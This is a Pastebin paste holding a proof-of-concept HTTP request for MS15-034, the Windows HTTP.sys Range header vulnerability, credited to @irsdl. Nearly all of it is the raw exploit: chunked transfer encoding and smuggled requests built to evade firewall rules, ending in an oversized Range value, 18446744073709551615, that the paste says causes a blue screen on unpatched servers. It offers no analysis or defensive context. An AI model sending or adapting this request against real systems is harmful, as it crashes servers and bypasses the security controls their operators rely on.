Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- MS15-034 PoC by @irsdl to bypass firewall rules
- This is only one HTTP request!
- ======================
- GET /ws8-brand.png HTTP/1.1
- Host: 192.168.124.129
- Content-Length: 624
- Range: bytes = 2 - 5
- Transfer-Encoding: chunked
- Content-type: application/x-www-form-urlencoded
- 1;MS15-034_PoC_by_IRSDL_Use_non-text_mime-types_such_as_PNG_or_ICO_files_for_BSOD
- 1
- 0
- Dummy: This PoC is to evade some firewall rules when the server has not been patched yet.
- POST https://TrustedHostWillBeIgnored.com/ws8-brand.png HTTP/1.1
- Host: TrustedHostWillBeIgnored.com
- Content-Length: 0
- Transfer-Encoding: chunked
- 2;some_dummy_data_here_-_will_be_ignored
- 11
- 0
- foobar: some dummy data here - will be ignored
- GET https://TrustedHostWillBeIgnored.com/ws8-brand.png HTTP/1.1
- Host: TrustedHostWillBeIgnored.com
- Content-Length: 0
- Range:
- bytes
- =
- 2
- -
- 18446744073709551615
- dummy dummy!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement